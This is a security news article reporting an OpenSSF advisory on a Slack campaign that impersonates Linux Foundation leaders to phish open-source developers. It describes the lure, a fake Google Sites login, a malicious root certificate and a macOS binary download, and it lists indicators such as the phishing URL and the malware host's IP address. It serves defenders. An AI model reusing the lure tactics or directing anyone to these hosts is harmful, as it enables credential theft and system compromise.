A sophisticated social engineering campaign is actively targeting open-source developers via Slack, impersonating trusted Linux Foundation community leaders to deliver malware and achieve full system compromise.
The OpenSSF Siren mailing list published a high-severity advisory on April 7, 2026, warning developers, particularly those active in Linux Foundation workspaces, about a multi-stage attack chain built on impersonation, credential harvesting, and malicious certificate installation.
What Is OpenSSF Siren?
OpenSSF Siren is a public threat intelligence mailing list operated by the Open Source Security Foundation (OpenSSF), itself a Linux Foundation project.
The platform was created to address a critical gap exposed by incidents like the 2024 XZ Utils backdoor: while the open-source ecosystem had mature mechanisms for vulnerability disclosure, it lacked a centralized post-disclosure channel for distributing active threat intelligence to the broader developer community.
Siren fills that gap by publishing indicators of compromise, active attack patterns, and response guidance after initial coordination has already occurred. The April 7 advisory was authored by Christopher “CRob” Robinson, CTO and Chief Security Architect at OpenSSF.
The Attack Chain: Four Stages From Impersonation to Compromise
The campaign targeted the Slack workspace of the TODO Group, a Linux Foundation working group for open source program office (OSPO) practitioners. In the documented incident, an attacker posing as a well-known Linux Foundation community leader sent a direct message to a victim, directing them to click the following URL:
https://sites.google.com/view/workspace-business/joinThe use of Google Sites infrastructure is deliberate and tactically significant. Because the domain is sites.google.com legitimate Google infrastructure, the link passes a casual visual inspection and may bypass security filters that block known malicious domains.
Once the victim clicks through, they are walked through a fake authentication flow that harvests their email address and a verification code.
The site then instructs the victim to install a “Google certificate,” which is in reality a malicious root certificate designed to intercept encrypted traffic.
The attack diverges by operating system from this point. On macOS, a script downloads and executes a binary called gapi from a remote IP address (2.26.97.61), with execution potentially resulting in full system compromise.
On Windows, the victim is prompted to install the malicious certificate through a browser trust dialog. In both cases, once the root certificate is trusted, the attacker can intercept HTTPS traffic and potentially harvest credentials, session tokens, and sensitive communications.
The full kill chain involves four distinct stages: impersonation of a trusted community figure, phishing via a socially engineered Slack message, credential harvesting via a fake authentication portal, and malware delivery via a malicious certificate and a remote binary.
The Lure: An AI Tool Pitch Designed for Developers
A Socket engineer who is a member of the TODO Group Slack received the attacker’s direct message firsthand and documented the specific social engineering tactic used.
The attacker, posing as a Linux Foundation leader, pitched what appeared to be an exclusive private tool: an AI-powered system claiming to analyze open source project dynamics and predict which contributions would be merged before any human review occurred.
The pitch leaned heavily on exclusivity, telling the target the tool was “only being shared with a few people for now,” a classic urgency-and-scarcity technique.
The message included the phishing URL alongside a fake email address (cra@nmail.biz) and an access key (CDRX-NM71E8T) designed to make the fake workspace flow appear legitimate and procedurally routine.
The attacker’s account has since been deactivated, consistent with the TODO Group administrators removing it after the advisory circulated.
Weaponizing the Trust Infrastructure of Open Source
What makes this campaign particularly dangerous is not its technical sophistication, but its abuse of the social trust layer that makes open source communities function.
Developers in spaces like the TODO Group routinely receive outreach from recognized names, project leads, foundation staff, and community organizers, and are conditioned to engage with those messages. An attacker who successfully impersonates one of those figures gains a substantial social advantage before a single malicious payload is executed.
This attack does not arrive as an unsolicited email from an unknown sender. It arrives as a Slack DM from someone who looks exactly like a colleague the target has likely interacted with before. That context dramatically lowers psychological defenses.
This campaign also arrives in the wake of a related threat. Last week, researchers documented a coordinated attack targeting high-impact Node.js maintainers, including the leads of Fastify, Lodash, dotenv, and Node.js core, using the same social engineering playbook that previously compromised the Axios project.
Mandiant researchers linked that campaign to a DPRK-nexus threat actor. Whether the two campaigns share infrastructure or attribution remains unconfirmed. Still, a clear pattern is emerging: open source maintainers are being systematically targeted through the very platforms and relationships they depend on to do their work.
Defensive Recommendations From the OpenSSF Advisory
The OpenSSF advisory offers concrete guidance for anyone active in Linux Foundation Slack communities or similar open source spaces. Developers should verify identities out of band, never trust a Slack message based on a username or profile photo alone, and always confirm unusual requests through a separate, known communication channel.
They should never install certificates from links, as legitimate services do not require users to install root certificates manually; any such prompt should be treated as malicious.
Developers should also avoid executing downloaded binaries or scripts, including any file received through Slack or delivered via a redirect, and be especially wary of curl | bash-style execution patterns. Finally, treat all unexpected security or authentication prompts as suspicious until independently verified by your organization’s IT or security team.
If you believe you may have been affected, the advisory recommends disconnecting from the network immediately, removing any newly installed certificates, running endpoint security scans, rotating all credentials, including GitHub tokens and SSH keys, and revoking active sessions and access tokens across cloud services.
FAQ
Q1: What is the phishing URL used in this campaign?
The attackers used https://sites.google.com/view/workspace-business/joina hosted site on legitimate Google Sites infrastructure to evade detection.
Q2: Which platforms are affected by the malware payload?
Both macOS (via a remote binary called gapi) and Windows (via a browser certificate trust dialog) are targeted, with macOS carrying the higher risk of full system compromise.
Q3: Is this campaign linked to the recent Node.js maintainer attacks?
Both campaigns use the same social engineering playbook, and the Node.js campaign has been linked to a DPRK-nexus threat actor, but a confirmed connection between the two has not been established.
Q4: What should developers do if they have installed the malicious certificate?
Immediately disconnect from the network, remove the certificate, run an endpoint security scan, rotate all credentials (GitHub, SSH, cloud tokens), and revoke active sessions.
Site: thecybrdef.com
About the Author
